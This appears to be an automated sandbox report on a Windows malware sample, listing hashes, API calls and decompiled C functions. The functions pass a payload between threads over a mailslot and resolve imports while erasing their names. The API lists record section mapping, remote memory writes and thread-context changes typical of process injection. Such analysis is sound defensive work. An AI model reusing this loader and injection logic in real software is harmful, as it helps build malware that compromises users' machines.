  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
